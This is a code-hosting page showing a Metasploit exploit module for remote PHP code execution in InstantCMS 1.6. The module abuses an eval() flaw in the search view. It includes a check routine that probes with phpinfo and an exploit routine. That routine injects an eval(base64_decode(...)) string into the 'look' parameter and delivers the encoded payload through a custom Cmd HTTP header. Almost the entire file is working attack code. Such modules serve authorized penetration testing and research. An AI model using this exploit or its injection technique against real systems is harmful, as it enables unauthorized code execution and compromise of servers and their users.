FilesExpand file tree

 master

/

26622.rb

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

87 lines (74 loc) · 2.35 KB

 master

/

26622.rb

Copy path

Top

File metadata and controls

• Code
• Blame

executable file

·

87 lines (74 loc) · 2.35 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name' => 'InstantCMS 1.6 Remote PHP Code Execution',

'Description' => %q{

This module exploits an arbitrary php command execution vulnerability, because of a

dangerous use of eval(), in InstantCMS versions 1.6.

},

'Author' =>

[

'AkaStep', # Vulnerability discovery and PoC

'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module

'juan vazquez' # Metasploit module

],

'License' => MSF_LICENSE,

'References' =>

[

[ 'BID', '60816' ],

[ 'URL', 'http://packetstormsecurity.com/files/122176/InstantCMS-1.6-Code-Execution.html' ]

],

'Privileged' => false,

'Platform' => 'php',

'Arch' => ARCH_PHP,

'Targets' =>

[

[ 'InstantCMS 1.6', { } ],

],

'DisclosureDate' => 'Jun 26 2013',

'DefaultTarget' => 0))

register_options(

[

OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"])

], self.class)

end

def check

res = send_request_cgi({

'uri' => normalize_uri(target_uri.to_s),

'vars_get' =>

{

'view' => 'search',

'query' => '${echo phpinfo()}'

}

})

if res

if res.body.match(/Build Date/)

return Exploit::CheckCode::Vulnerable

else

return Exploit::CheckCode::Safe

end

else

return Exploit::CheckCode::Unknown

end

rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

return Exploit::CheckCode::Unknown

end

def exploit

print_status("Executing payload...")

res = send_request_cgi({

'uri' => normalize_uri(target_uri.to_s),

'vars_get' =>

{

'view' => 'search',

'query' => rand_text_alpha(3 + rand(3)),

'look' => "#{rand_text_alpha(3 + rand(3))}\",\"\"); eval(base64_decode($_SERVER[HTTP_CMD]));//"

},

'headers' => {

'Cmd' => Rex::Text.encode_base64(payload.encoded)

}

})

end

end